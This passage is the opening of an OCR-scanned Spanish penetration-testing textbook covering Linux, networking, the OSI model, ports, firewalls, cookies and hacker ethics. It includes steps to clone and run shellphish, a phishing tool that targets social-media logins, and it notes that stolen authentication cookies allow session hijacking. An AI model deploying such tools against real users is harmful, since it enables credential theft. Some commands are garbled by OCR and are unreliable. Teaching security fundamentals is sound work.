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INTRODUCCION 


Este libro esta disefiado para ser una guia e introducirte al area de seguridad 
informatica, trabajando no solo desde el punto de vista técnico, si no también, usando 
las metodologías adecuadas para realizar pruebas de penetración o auditorías de 
seguridad en distintos casos. Lo más importante de este libro, será como entendiendo 
la metodología y su uso de manera y avanzaremos sin límites. 


Este libro basado en la certificación G.H.O.S. T (Grey Hat Offensive Security 
Technician), tiene todo lo que necesita una persona para adentrarse al mundo 
del hacking por medio de técnicas utilizadas por un sombrero gris, para cuando 
termines el libro dominarás el tema, lo que significa que aprenderás cómo atacan los 
cibercriminales, para poder proteger a una empresa adecuadamente de ellos. 


¿PARA QUIÉN ES ESTE LIBRO? 


Este libro está hecho para el que quiera convertirse en un hacker profesional, 
te llevará de la mano para que te conviertas en un experto en el área de seguridad 
informática sin importar si tienes conocimientos avanzados de informática, o si 
eres principiante. 


También, si tienes interés en hacer alguna certificación de ciberseguridad 
como G.H.O.S.T u otra como el CEH, este libro te dará las bases necesarias en 
conocimientos prácticos y técnicos para poder aprobar estas certificaciones, siempre 
y cuando realices todas las prácticas en el libro y estudies adecuadamente las técnicas 
y fundamentos mencionados aquí. 


12 ELLIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA © RA-MA 


¿QUIÉN SOY? 


Mi nombre es Pablo Gutiérrez, soy consultor en seguridad informatica, 
hacker profesional en el area del pentesting, CEO de WhiteSuit Hacking, CSO de la 
empresa de seguridad anti-espionaje Privasee, conferencista, instructor y creador de 
la certificación G.H.O.S.T, actualmente la más completa y actualizada certificación 
de hacking con enfoque practico, y del Hacking Day, el mejor curso de introducción 
al hacking, y estoy certificado en CEH por la empresa EC-Council. 





Adicionalmente, si deseas tomar alguna certificación o curso, actualizarte 
con noticias y nuevas cosas en nuestro blog, o requieres algún servicio profesional 
de ciberseguridad, puedes encontrarnos/contactarnos en whitesuithacking.com, 
fb.com/whitesuitshacking, o fb.com/pablogtz.ciberseguridad. 


ESTRUCTURA DEL LIBRO 


El libro está estructurado de manera muy similar a nuestro curso G.H.O.S.T, 
en base a la metodología internacional de prueba de penetración. 


Esta metodología la llevaremos por pasos, y aunque para muchos que han 
visto y creen que el hacking es como en muchas películas (rápidamente teclear el 
código para entrar por la puerta trasera del sistema) en la realidad hacerlo toma 
tiempo y paciencia. 


La metodología que usamos es muy similar al “método científico”. 
Esencialmente obtenemos la información, se analiza y luego atacamos, y en base al 
alcance del ataque, reportará, dependiendo de tu objetivo, adicionalmente, se verá un 
poco de análisis forense de forma superficial. 
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El libro consta de 9 partes: 
1. Teoria/fundamentos: Fundamentos que necesitas para el resto del libro 
2. Reconocimiento: Metodologías para obtener información del objetivo 


3. Análisis de vulnerabilidades: Como analizar la información para 
encontrar un punto débil 


4. Explotación: Formas de ataque 
5. Post-explotación Que hacer luego que se obtiene el acceso 


6. Informe: Cómo se debe reportar la información obtenida a un cliente y 
cómo debe ser estructurado un informe final 


7. Análisis forense: Los principios del análisis forense, pero debe 
considerarse que esto se verá superficialmente 


8. Anonimato: Como mantener tu identidad y presencia oculta en la red. 


9. Casos: Casos reales de ataques de cibercriminales y pruebas de 
penetración. 


En cada una de estas secciones se expondrá cómo funciona cada uno de 
los pasos de la metodología y las distintas herramientas para obtener los resultados 
que se quieren. Se explica cómo se utiliza la herramienta, su funcionamiento, y en 
qué casos usar y en cuáles no, y se menciona un caso real para que se entienda la 
importancia de esa parte de la metodología. 


Adicionalmente, subí una página donde están todas las herramientas y 
sistemas que utilizamos en el libro, además de algunos videotutoriales en 


https://whitesuithacking.com/material-libro 


Recomiendo AMPLIAMENTE descargar el material ahí ANTES 
de empezar con las practicas, ya que el Kali normal no tiene muchas de las 
herramientas mencionadas en este libro. 


CÓMO OBTENER AYUDA 


Tenemos una comunidad en Telegram en la que puedes entrar y preguntar 
cualquier duda o problema de este libro, la liga para entrar es https: //t.me/wshgrupo, 
debes tener Telegram instalado para que la liga funcione. 


FUNDAMENTOS 


Antes que nada, veremos algunos de los fundamentos que tienes que tener 
para poder entender sobre cómo utilizar las herramientas, el sistema operativo que 
utilizamos, y para que entiendas como funciona una herramienta en particular o un 
ataque, quizás ya dominas estos temas en dado caso, puedes avanzar a los siguientes 
capítulos, sin embargo, si nunca has tenido experiencia o conocimiento en estos 
temas que son Linux, Redes, Modelo OSL te recomiendo no saltarte estos capítulos 
ya que serán la base de tu preparación. 


1.1 LINUX 


Linux es un sistema operativo de código libre basado en Unix creado por 
Linus Torvalds, originalmente fue diseñado para uso en ordena personales, pero 
al ser código abierto, se utiliza hoy en día en muchos tipos de dispositivos, desde 
servidores, hasta en móviles, como ejemplo tenemos el desarrollo del sistema 
Android. 


Linux se puede encontrar de varias maneras en lo que son llamadas 
distribuciones, las cuales, tienen diferentes diseños y funcionalidad además de 
soportar diferentes librerías y utilidades según sea la distribución, estas pueden ser 
enfocadas desde seguridad informática, como lo es Kali, hasta uso personal como lo 
es Ubuntu, existen todo tipo de distribuciones enfocadas a diferentes cosas, desde 
informática forense, hasta análisis de data o procesamiento con superordenadores. 


k 


Hablemos de usuarios dentro del sistema operativo. En Linux, así como en 
otros sistemas operativos, existen usuarios con diferentes permisos, aquí llamamos 
al usuario que tiene permiso total sobre el sistema, usuario Root, o en algunos 
sistemas se le dice el superusuario, normalmente en Linux evitaríamos utilizar el 
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usuario root, ya que de explotar una vulnerabilidad, de lo cual hablaremos luego, el 
atacante tendria control completo del sistema, y por esta razon usualmente utilizamos 
el comando sudo, el cual da permiso a un usuario con menos privilegios de utilizar 
una aplicacién que requiere de privilegios de superusuario, la forma en la que se 
usa es la siguiente(ejemplo): usuario# sudo nmap 192.168.1.1, hay que notar que 
la palabra sudo se utiliza al inicio antes de mandar llamar a la aplicación, otra cosa 
que vale la pena mencionar es que el comando sudo se puede utilizar para cambiar 
de usuario, por ejemplo, el comando sudo -s cambia de usuario de un usuario normal 
a uno con privilegios de root, sin embargo en este curso pocas veces utilizaremos el 
comando sudo, ya que en el contexto de seguridad necesitamos utilizar siempre el 
usuario root para la mayoría de nuestras herramientas. 


La mayor parte de este curso será llevado a cabo en un sistema Linux llamado 
Kali Linux modificado por nosotros para que tenga todas, o mínimo, la mayoría, de 
las herramientas que se utilizaran en este libro, este sistema está basado en Debian, 
una distribución de Linux bastante famosa y utilizada en una amplia variedad de 
aplicaciones. 


1.1.1 Terminal de Linux 


En Linux, nos vamos a mover por el sistema y utilizar las herramientas en 
su mayor parte a través de comandos en la terminal, o la consola de comandos, 
también conocida como shell, seguro la has visto en alguna película de hackers o 
serie como “Matrix”, o “Mr. Robot”, si no es que la has utilizado en tu propio sistema 
operativo, ya que cada sistema operativo tiene su propia versión, aunque ligeramente 
diferente en cuanto a comandos, OSX, Windows y Linux tienen todas su propia 
consola de comandos. 


La consola de comandos, esencialmente, es una forma de controlar a un 
sistema sin necesidad de una interfaz gráfica (GUI), ya que hay muchas ocasiones en 
las que una interfaz gráfica es pérdida de tiempo/procesador, innecesaria, inaccesible 
(como a través de una conexión SSH) o simplemente inexistente, de forma que, si 
desean desarrollarse en el área de seguridad informática, o cualquier área de sistemas 
en general, es fundamental dominar la consola de comandos. 


Lo primero que debes entender sobre la terminal (por cierto, terminal y 
consola de comandos son sinónimos, de ahora en adelante en este libro me referiré 
a esto como terminal), es que esta solo admite texto para manejar entradas y salidas 
de datos, no existen botones, ni iconos, ni imágenes como probablemente estés 
acostumbrado en la mayoría de los sistemas operativos. 
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La terminal es la forma mas directa de hablarle a tu sistema, entonces debes 
aprender su sintaxis. Hay varios tipos de entradas que se pueden utilizar, uno de 
estos se llaman parámetros, que son objetos de información que le dirán al programa 
llamado “que hará” y/o a “quien” le hará eso, por ejemplo, si llamamos el programa 
“nmap”, el comando sería este: 


nmap -sV whitesuithacking.com, dentro de este comando, existen varias 
partes; la primera, es que mandamos a llamar a la herramienta por su nombre y la 
segunda, es el parámetro que le dice que es lo que va a hacer, en este caso es “-sV”, 
nota que las letras van justo después de un guión, eso le dice al sistema que es un 
parámetro en el que le dirá a la herramienta que es lo que va a hacer, y al final, una 
página web, aquí le está dando el “objetivo” a la herramienta. 





Así como mandar llamar herramientas y utilizarlas, la terminal también 
puede realizar distintas acciones en el sistema y en sus archivos, tales como borrar, 
mover, abrir o modificar archivos, para esto, basta con seguir la misma estructura en 
algunos comandos, tales como borrar un archivo, basta con poner el comando y el 
nombre del archivo, sin embargo, en otros, tales como mover un archivo, se requiere 
darle también el parámetro de a dónde vas a mover dicho archivo. 


También vale la pena mencionar que, dentro de la terminal, se te mostrará 
tu usuario, y tu ubicación, y solo podrás modificar/utilizar archivos que estén en tu 
ubicación, o mandándolos llamar a su ubicación exacta en tu sistema, algo así: 


Por partes, hablaré un poco de cómo está la estructura de la terminal a como 
está demostrado en la imagen anterior: 


1. En esta línea, se puede observar un comando llamado “ed”, que significa 
“change directory” (cambiar directorio), y posteriormente se le da una 
ruta, de esta forma, puedes moverte a través de los directorios en el 
sistema. 


2. En esta ocasión, se le da el comando “Is”, que significa listar los archivos 
en ese directorio. 
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3. Este es un ejemplo de un archivo que esta en este directorio, podrás 
interactuar directamente con este archivo debido a que estas en esta 
ubicacion. 


4. Este texto azul dice en qué ubicación te encuentras en el momento 


5. Este texto rojo te dice en qué usuario estas. 


Asi como estos comandos que mencione, existen muchos otros, a 
continuación, adjuntare un “acordeón” de algunos de los comandos en Linux que 
puedes utilizar. 


1.1.2 Instalando herramientas 


Para instalar herramientas en Linux, debemos descargar el archivo de 
instalación, que puede ser con el comando wget <ubicación de descarga> / 
lugardondeguardar, o, si la herramienta está en GitHub, utilizar el comando 
git clone <liga de GitHub> /lugardondeguardar, una buena práctica es siempre 
guardar las herramientas en la carpeta opt. 


Por ejemplo, vamos a imaginar que quieres descargar la herramienta 
shellphish, primero, debes irte a la ubicación donde está dicha herramienta, en este 
caso es un GitHub. 


Te vas a la página https://github.com/thelinuxchoice/shellphish/ y te 
encontrarás algo similar a esto. 


Él thelinuxchoice / shellphish 





<> Code issues Y Fi Pull requests € Wiki ids Insights 


Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify. Netfiix Linkedin, 
Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest 


github instagram wordpress reicrosof snapchat phishing: phisher facebook google 


XB 57 commits Bt branch © 0 releases Ag 1 contributer af GPL-3.0 


GB thelinuxchoice Update REAUMEmd Latest commit ozbSee1 35 minutes age 


Ba sites Ada files via upioad 8 days age 
ES LICENSE Update LICENSE 7 days age 
E READMEmd Update README. md 35 minutes aga 





E sheliphisn.sh Update sheliphish.sh 7 days ego 
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En esta pagina, presiona el botón verde, y copia la liga que aparece ahi. 


Create new file . Upload files Find file 


Clone with HTTPS © Use SSR 
Use Git or checkout with SVN using the web URL. 


z Ms : Pe 
httos://github.com/thelinuxchoice/shelip | E 
Ee 


Open in Desktop Download ZIP 





Ahora, en la terminal de Linux, escribe el comando git clone hitps://github. 
:/# git clone https://github.com/thelinuxchoice/shellphish.git /opt/shellphish 






com/thelinuxchoice/shellphish.git /opt/shellphish 


Cloning into '/opt/shellphish'... 

remote: Counting objects: 425, done. 

remote: Compressing objects: 100% (39/39), done. 

remote: Total 425 (delta 19), reused 0 (delta 0), pack-reused 386 
Receiving objects: 100% (425/425), 12.35 MiB | 2.82 MiB/s, done. 
Resolving deltas: 100% (145/145), done. 





Y listo, una vez que se haya copiado en la ruta que indicaste. 


Te mueves a la ruta, le das permisos si no los tiene (chmod +x) y ejecutas el 
archivo principal. 


:/# cd ee 
: AR ls 
LICENSE README .md _sheLiphish, sh 


# chmod 4x shellphish. sh 
h# ./shellphish.sh 





Y listo, ahi ya se deberia de haber ejecutado la herramienta, nota que puede 
variar en la instalación, vale la pena que busques instrucciones si tienes duda, por 
ejemplo, hay unas herramientas (los paquetes debían) que se deben instalar con el 
comando dpkg -i <archivo>. 
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1.1.3 Interfaz de red 


La interfaz en un sistema es por donde entran y salen paquetes para 
comunicación con otros sistemas. 


Cualquier hardware que reciba y mande paquetes, se puede considerar como 
una interfaz, un ejemplo del más utilizado es la tarjeta de red, es decir, lo que te 
permite acceder al internet por medio de wifi, o con conexión ethernet, otra interfaz 
podría ser una antena de bluetooth. 


Generalmente las interfaces se muestran en un sistema operativo con algún 
código en particular, por ejemplo, Kali Linux las identifica como eth a las interfaces que 
representan una conexión ethernet, y wlan las interfaces que representan una conexión 
por medio de wifi, después de estos nombres tienen un número empezando desde el 
cero, ya que un sistema puede tener más de una interfaz funcionando al mismo tiempo. 


Para ver información de estas, en Kali podrías escribir el comando ifconfig y 
te las mostrará, mientras que en Windows sería el comando ipconfig. 


:-# ifconfig 

ethO: flags=4163<UP ,BROADCAST ,RUNNING,MULTICAST> mtu 1500 
inet_192.168.1.67 netmask 255.255.255.0 broadcast 192. 
inet6 fe80::20c:29ff:fe80:2c2d prefixlen 64 scopeid 0x 
ether 00:0c:29:80:2c:2d txqueuelen 1000 (Ethernet) 


RX packets 62354 bytes 62313500 (59.4 MiB) 

RX errors 21 dropped 80 overruns 0 frame 0 

TX packets 12277 bytes 750945 (733.3 KiB) 

TX errors © dropped 0 overruns © carrier 9 collisions 
device interrupt 19 base 0x2000 





Al ingresar el comando en Kali, podrias esperar una respuesta similar a esta. 


Como puedes ver, el comando es ifconfig, el nombre de esta interfaz 
(ethernet), es eth0, y la IP en esta interfaz, es 192.168.1.67, esa es una ip local. 


1.2 REDES, PROTOCOLOS Y PUERTOS 


Para poder convertirte en un hacker algo esencial que debes tener, sin 
importar que, son fundamentos de redes. 


Francamente considero entender adecuadamente de redes el conocimiento 
mas importante y elemental para un hacker, podras ser mediocre y hasta deficiente 
en programación y aun asi poder manejarte decentemente en un pentest, pero 
absolutamente no puedes darte el lujo de no entender bien los fundamentos de redes, 
ya que esencialmente eso es el hacking. 
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Para ponértelo de otra forma, el “hackear” o comprometer un sistema, no 
es nada más ni nada menos que utilizar el conocimiento que tienes de cómo se 
comunican los ordenadores para manipular un sistema, y la comunicación de los 
ordenadores son las redes, y no me refiero a las redes sociales, me refiero al modelo 
OSI, los puertos, servicios, y distintos protocolos de comunicación, pero no te 
preocupes, en seguida te daré una introducción al tema. 


1.2.1 Modelo OSI 


El modelo de interconexión de sistemas abiertos (también conocido 
como Modelo OSI), es un modelo de referencia para los protocolos de la red de 
arquitectura en capas creado en los 80’s por la Organización Internacional de 
Normalización (ISO), en español, esencialmente es una referencia de cómo deben 
comunicarse todos los ordenadores y sistemas, en base a este modelo entramos a 
Facebook, hablamos por Skype, accedemos bases de datos y jugamos videojuegos, 
prácticamente todas las comunicaciones en los sistemas que utilizamos siguen el 
modelo, o, en otras palabras, las “reglas” del modelo OSI, y suena complejo, pero 
realmente no es más que una sintaxis de qué información deben tener los paquetes, 
que es la forma en la que se comunican los ordenadores, para que estas puedan 
comunicarse de manera efectiva. 


De seguro te preguntaras, ¿Porque es necesario esto? 


Bueno lo que pasa, es que los ordenadores son efectivamente ciegas y sin 
tono de voz, y sin mucha “inteligencia”, entonces al comunicarse con otro sistema, 
en cada “palabra” que se manda (paquete), se tiene que especificar con quién se está 
hablando, comprobar que se está poniendo atención, y en que lenguaje se establecerá 
la comunicación, por eso es que existe un modelo tan completo solo para que los 
sistemas se “hablen” entre ellos. 


Debemos de recordar que la comunicación de los ordenadores realmente no 
es muy diferente a la nuestra, ya que, como humanos, diseñamos sistemas basados 
en lo que conocemos, lo que tienes que hacer para entender esto, es simplemente 
intentar comparar la comunicación de los sistemas con la de un humano con ciertas 
características, y después de un tiempo, notaras que realmente, aunque rústico, es un 
lenguaje/estructura de comunicación muy parecida a la nuestra. 


Ahora, la comunicación en el modelo OSI está dividido en “capas”, que, 
en cada una de estas capas, es donde se incluye cierto tipo de información sobre el 
paquete, existen siete capas en el modelo OSI, como se demuestra en la siguiente 
imagen. 
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Las capas, del 1 al 7, muestran información desde lo más “básico”, como los 
bits, que sería algo que se muestra en la capa 1, la capa física, hasta información 
de más alto nivel, como la capa 7, que muestra información de la aplicación que 
mandó dicha información. 


En otras palabras, mientras más cercano al uno, más cercana está la 
información a lenguaje máquina, y mientras más cercano al siete, más cercana está 
la información al usuario. 


A continuación, hablaré más en detalle de cada una de las capas: 


Capa 1 


Capa de nivel físico, esta es la capa que transmite impulsos eléctricos, 
señales de luz o de radio a través de una red o mecanismo en un nivel físico. 


Capa 2 


Capa de Enlace de datos, aquí se divide en dos subcapas, la dirección MAC 
(Media Access Control), la cual es una clave única que diferencia tu dispositivo 
globalmente, es también la clave de la interfaz de red de tu ordenador que le asigna 
su fabricante, todos los dispositivos que se pueden conectar a una red tienen una 
dirección MAC, esto sirve para controlar como un ordenador en una red obtiene 
acceso a los datos y permisos de transmitirlos, y la capa Logical Link Control 
(LLC), que controla sincronización de capas, flujo de control y chequeo de errores. 


Capa 3 


Capa de Red, aquí es donde se les da a las interfaces acceso a tecnologías de 
ruteo, caminos lógicos, transmitiendo data de nodo a nodo. En esta capa se asignan 
direcciones en una red, utilizando las direcciones IP. 


Capa 4 


Capa de Transporte, en esta capa se utilizan tecnologías para transmitir data 
entre sistemas, por ejemplo, a través de conexiones UDP o TCP. 


Capa 5 


Esta es la capa de sesión, que es la capa que se encarga de mantener y controlar 
el enlace establecido entre los dos sistemas; esencialmente la función de esta capa 
es que no se corte o se pierda la comunicación a mitad de una “conversación”. Algo 
que podríamos encontrar en esta capa sería una cookie. 
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Capa 6 


Esta es la capa de presentación, la función de esta capa es la de controlar 
que en si el sistema pueda entender la información mandada, es decir, que los datos 
sean reconocibles. 


Por ejemplo, esta capa es la que permite el cifrado de datos, y la que controla 
que la semántica y sintaxis de los datos puedan ser entendidos por los distintos sistemas. 


Capa 7 


Y finalmente, la capa siete, es la capa de aplicación, aquí es donde se definen 
los protocolos que utilizan las aplicaciones para intercambiar datos, como SMTP, 
FTP, gestores de bases de datos, etc. En otras palabras, es donde se empaqueta la 
data acorde a la aplicación o programa que va a utilizar la data. 


data unit layers 




















Host Layers 


Media Layers 


Figura 1.1. Capas del Modelo OSI 
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Y listo, esas son todas las capas, no te preocupes si ahorita no tienen tanto 
sentido, aunque no seria mala idea invertir algo de tiempo intentando entender el 
modelo, entiendo que probablemente mucho de esto a este punto no te hace tanto 
sentido si no tienes experiencia en redes, y este no es un libro de redes, asi que no te 
preocupes, mientras mas avancemos en este libro mas te comenzaran a hacer sentido 
estas últimas páginas. 


1.2.2 TCP/IP 


Ahora, para comunicarse, hay dos protocolos de comunicación, llamados 
TCP y UDP, para entender esto mejor velo como el “tono” en el que las máquinas 
hablan, yo veo la diferencia entre estos protocolos como en cómo nos comunicamos 
cuando uno da una plática a cientos de personas, contra compartir un secreto íntimo 
con un amigo, a pesar de que podríamos estar (potencialmente) comunicando lo 
mismo, lo comunicaríamos de una manera muy diferente, ¿no crees? Entonces 
esas formas de comunicar en cuanto a sistemas se utilizan para diferentes tipos de 
información, a continuación, explicare cada uno de esto. 


1.2.2.1 TCP 


Transmission Control Protocol, también conocido como TCP, o el 
protocolo orientado a conexiones, es el protocolo que sería el equivalente a 
comunicar un secreto íntimo a un amigo. 


Este protocolo está diseñado para mantener una conexión estable y segura, y 
para esto, lleva a cabo algunas verificaciones por medio de paquetes, esto es llamado 
el “Three-way handshake”, debido a que se realizan tres verificaciones antes de 
establecer la conexión y mandar datos. 


Estas verificaciones se realizan a través de paquetes, y estos se llaman SYN, 
ACK/SYN, ACK: 


W SYN: El cliente manda un paquete para establecer comunicación con el 
servidor. 


Y ACK/SYN: El servidor responde con este paquete para reconocer que ha 
recibido la solicitud de comunicación. 


Y ACK: El cliente regresa el paquete para finalmente comenzar una 
comunicación estable. 


Esto se realiza para confirmar que la máquina de hecho está escuchando 
los datos, si los humanos hiciéramos esto sería como si yo antes de decirte algo, 
te digo “hola, podemos hablar?”(este sería el primer paquete SYN), espero a que 
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me confirmes “si, podemos hablar” (sería el equivalente al paquete ACK/SYN), y 
confirmó que te escuche diciendo “ok, ya te diré” (este sería el paquete ACK), y 
después de eso yo considero que ya confirme que me estas poniendo atención, y 
podemos iniciar nuestra conversación. 


Este protocolo es muy importante para casi todo lo que hacemos en la red, 
ya que confirma que cada paquete que se mando ha sido recibido adecuadamente, 
piénsalo, si descargas un PDF, por ejemplo, que pesa 10mb y se te corta la conexión 
a los 9.90mb, ¿Qué sucedería? ¿Lo podrías ver incompleto? 


Claro que no, se corromperá el archivo completo y tendrías que descargarlo 
de nuevo completó, el protocolo TCP es el que se asegura que eso no suceda seguido, 
que, si se cae un paquete, simplemente se re-solicita y se reenvía, hasta que se reciban 
todos los paquetes con completa integridad. 


1.2.2.2 UDP 


Por otro lado, existe el protocolo de comunicación User Datagram Protocol, 
o, UDP, este protocolo de comunicación es el equivalente a si yo estoy dando una 
plática a cien personas, realmente no pongo atención que absolutamente todas me 
pongan atención o me entiendan, si alguien se distrae yo aun continuo. 


¿En este protocolo no existe algo como “three-way handshake”, los paquetes 
UDP están enfocados a velocidad, simplemente se mandan, sin confirmar si han sido 
recibidos, y es que este protocolo de comunicación se utiliza para aplicaciones que 
requieren mucha velocidad y que la integridad de cada uno de los paquetes es menos 
relevante, por ejemplo, Skype, alguna vez has tenido una videoconferencia y se te 
cayo el internet por un momento y luego regreso? ¿Qué sucedió? ¿Se volvieron a 
mandar los paquetes que no llegaron? No, lo que probablemente sucede es que se 
congeló momentáneamente la llamada, y luego continuó en tiempo real, y lo que se 
dijo en la llamada mientras que se cayó la conexión, se pierde, pero está bien, porque 
eso permite una comunicación más rápida y dinámica. 


1.2.2.3 IP 


Internet Protocol, o, IP, en este contexto, es una “etiqueta” numérica 
que se le asigna a todo sistema que se comunica bajo el protocolo de internet para 
identificarlo en una red. 


Esta etiqueta, llamada IP, facilita las funciones de ruteo que permiten 
la transmisión de datos de un sistema a otro, es por así decir, la dirección que te 
permitirá mandar una carta a alguien. 
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Actualmente existen dos versiones de IP, la IPV4, la cual es la más común 
actualmente, y la nueva versión, la IPV6. La versión IPV4 contiene 32 bits, y la 
razón por la que existen dos versiones, es que las direcciones IP, no son ilimitadas. 


La versión IPV6 fue creada en 1995 como respuesta a las limitaciones de la 
versión IPV4 en cuanto al número máximo de direcciones IP que se pueden asignar 
(ya que, como direcciones normales, no puede haber dos iguales en la misma red), 
y a diferencia de esta, la versión IPV6 cuenta con 128 bits, lo cual incrementa por 
mucho el rango posible de direcciones IP que se pueden asignar sobre esta versión. 


Sin embargo, aun en el 2018 se siguen usando predominantemente las 
direcciones IPV4. 


Existen dos tipos de IPs, las que están en una Local Address Network 
(LAN), lo cual significa que están dentro de una red local, y, por lo tanto, con esa IP 
solo se pueden comunicar con equipos en la misma red local. Esta sería el tipo de 
IP que tiene tu ordenador o móvil al conectarse al internet de tu casa. 


Y las que direcciones Wide Area Network (WAN), que son direcciones IP 
globales, es decir se pueden comunicar con cualquier dirección IP global de internet, 
pero no pueden acceder directamente a una dirección IP local sin estar en esta. Esta es 
la IP que tiene tu modem, y que utiliza para conectarse a los servidores de Facebook, 
Netflix, Google, etc. 


Para explicarme mejor de cómo funciona la direcciones IP, te daré un 
ejemplo, digamos que ahorita mismo estás en tu casa conectado a tu modem, y 
tienes dos dispositivos conectados, tu móvil, y tu laptop, dentro de tu red local, en 
otras palabras, tu LAN, tu móvil tendría una IP, digamos 192.168.1.10, y tu laptop 
otra IP, digamos 192.168.1.11, y tu modem otra, 192.168.1.254, digamos que la 
IP de Facebook es 32.111.123.32, tú al momento de acceder a Facebook, no estás 
accediendo por medio de tu IP, lo que está sucediendo es que tu router tiene además 
una IP global (WAN) que tu ISP te asignó, y por medio de esa IP le pide a Facebook 
tu información, recibe la información en tu modem, y te la comunica a tu laptop. 


Este es un tema importante, así que te explicare con una analogía que se 
puede y que no se puede hacer en cuanto a comunicación entre direcciones IP. 


Consideremos esto: dos estados en México, Nuevo León, y Jalisco, y cada 
una tiene dos ciudades, Nuevo León tiene Monterrey y San Pedro, y Jalisco en 
Guadalajara y Zapopan. 


Imaginemos que tu vives en Guadalajara y quieres mandarle una carta a tu 
amigo en Zapopan, en este caso, simplemente se la mandas sin problema, debido a 
que están en el mismo estado, este sería el caso de tu ordenador comunicándose con 
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tu móvil estando en la misma red local, sin embargo, digamos que ahora tú quieres 
mandar una carta a un amigo en Monterrey, en este caso, si simplemente mandas la 
carta a Monterrey, no va a llegar, lo que tendrías que hacer, es mandar la carta a través 
de Jalisco, para que Jalisco se la mande a Nuevo León, y Nuevo León se la entregue a 
Monterrey, esencialmente así funcionan las redes, en este caso las ciudades están en la 
misma red local dentro de una LAN, y los estados representan direcciones IP WAN. 


1.2.3 Puertos 


Los puertos son la entrada y salida de paquetes, es en estos que se corren lo 
que se llaman servicios, que son las aplicaciones que están haciendo uso del puerto 
para comunicar algo a otro sistema, por ejemplo, si estás usando el servicio SSH, 
este está corriendo en el puerto 22, por donde está mandando y recibiendo paquetes 
para comunicarse con otro sistema. 


Los puertos son extremadamente relevantes en el área del hacking, ya que 
pueden ser utilizados para obtener mucha información de un sistema, y prácticamente 
todos los ataques informáticos utilizan un puerto para realizar el ataque, o para 
comunicar información al haberse comprometido un sistema. 


Puedes imaginarlo como, literalmente, el puerto (donde entran y salen 
barcos) de una ciudad, siendo la ciudad la IP, y los barcos los paquetes con data. 


1.2.4 Firewall 


Ahora, de seguro has escuchado hablar del firewall, o “cortafuegos”, esto es 
un sistema de seguridad que esencialmente actúa como una frontera. 


Si, un firewall no es más que una frontera, en la que se tienen reglas, esta 
“frontera” monitorea todos los paquetes, y solo deja entrar los que tengan ciertas 
características, por ejemplo, lo más común en un firewall empresarial es que no 
admite ningún paquete que quiera entrar a la red desde afuera, pero si la conexión se 
inicia desde adentro, si se admite. 


Un firewall en sí puede ser configurado en una infinidad de formas, puede 
poner reglas como “no permitir la entrada de paquetes que contengan x información 
o que provengan de x dirección”, por lo que es una herramienta muy poderosa 
de seguridad, si se utiliza correctamente, y esa es la palabra clave, un firewall 
generalmente hablando es imposible “hackear”, lo que sucede, comúnmente es que 
los programadores que configuraron el firewall no pusieron la seguridad suficiente 
o no lo configuro bien, y por lo tanto se convierte en un punto débil dentro de la 
infraestructura de seguridad de una organización. 
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Los firewalls pueden ser instalados en routers, switches, servidores y 
ordenadores, protegiendo de forma perimetral diferentes objetos en una red 
organizacional. 


1.2.5 Cookies 


Una “HTTP cookie”, también llamada simplemente “Cookie”, es una pequeña 
pieza de data que se manda de una pagina web y se almacena en un ordenador por 
el navegador del usuario, esto se puede observar cuando se mandan paquetes HTTP. 


Las cookies representan “sesiones” o “estados” de usuarios, y fueron 
diseñadas para que un navegador pudiera recordar y rastrear la actividad del usuario 
como sus clics, sesiones en páginas con autenticación, y que páginas se han visitado 
antes, de forma que el navegador puede asistir mejor al usuario para acceder a su 
información más rápidamente. 


Alguna vez te has preguntado cómo es que aunque apagues tu ordenador o 
cierres tu navegador, ¿sigues autenticado en Facebook, Twitter, YouTube, Google, 
etc.? bueno la razón es porque las cookies que tiene tu navegador, le dicen a estas 
páginas que sigues conectado, y que no te cierre sesión, también sirve a páginas 
como Amazon, Google y Facebook para rastrear a través de la internet y venderte 
cosas que buscaste, y generalmente es un buen sistema, la cuestión es que hay un 
tipo de cookie, llamada “cookie de autenticación” que guarda si está autenticado o 
no en una página, y si un atacante logra robarla exitosamente, podría potencialmente 
secuestrar tu usuario sin tener que utilizar tu contraseña. 


One fine Monday morning 


Hang on to this, OK? No problem! 





The following Wednesday afternoon 


ae ! Here's that 
` cadkie from Monday. Prada 






| 02; 


© RA-MA Capitulo 1. FUNDAMENTOS 29 


1.3 SEGURIDAD INFORMATICA 


Ahora que hemos visto algo de los fundamentos de redes, antes de empezar 
a hackear, tienes que saber un poco de los fundamentos de seguridad informatica, 
ya que, aunque muchas personas saben que es “hackear”, muy pocas realmente 
entienden lo fundamental e importante dentro del área de seguridad informática. 


Antes que nada, quiero dejar algo muy claro, el ciberespacio es una zona de 
guerra, y las técnicas que vemos en este libro son tácticas de guerra, y puedes causar 
daños reales, o proteger de daños reales, en mi opinión debemos ver al hacker como 
lo que es, un potencial soldado moderno (literalmente países como China tienen 
ejércitos de hackers). 


Ahora, contestare una de las preguntas más básicas, estás leyendo este libro 
para convertirte en un hacker, pero ¿Que es un hacker? 


La definición de hacker puede variar dependiendo del contexto, ya que hoy 
en día utilizan esa palabra para casi todo, desde “hacker” significando programador, 
hasta “hacker de la vida”, con “tips” para hacer ciertas cosas más fáciles, sin embargo, 
dentro de este contexto, definir a un hacker como un experto en ciberseguridad, 
capaz de resolver problemas de tecnología y seguridad en diferentes contextos, 
ahora, algunas personas (Hollywood) ven usualmente a los hackers como 
cibercriminales, es decir que su profesión implica robar datos, y, este simplemente 
no es el caso, un hacker es alguien con el conocimiento que le permitirá tanto robar, 
como proteger la seguridad de la información de alguna organización o persona, 
es tanto como un ingeniero químico que es capaz tanto de crear drogas sintéticas 
dafiinas, como medicina para alguna enfermedad, el conocimiento no es bueno ni 
malo, simplemente depende de la persona que lo utilice. 


1.3.1 Filosofías de hacking 


Ahora, el tema del uso del conocimiento para proteger y comprometer 
información ha estado en debate desde siempre, tanto que las diferentes “filosofías” 
de uso de los hackers están clasificados con sombreros, que definen el objetivo y 
tipo de acciones que un hacker podría realizar. Generalmente hablamos de tres tipos 
de sombrero. 


Sombrero Blanco 


Empezaremos hablando del hacker bueno, el que debemos aspirar a ser, y 
el tipo de hacker que somos en WhiteSuit Hacking. Este tipo de hacker, a pesar 
de que tiene capacidades destructivas como cualquier otro, se dedica a proteger 
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la información de sus clientes, nunca hace pruebas de penetración ni análisis de 
vulnerabilidades sin autorización y un contrato firmado, también es conocido como 
el hacker ético, ya que nunca realiza actividades de hacking que puedan caer fuera 
de la ley o de cierto estándar de ética. 


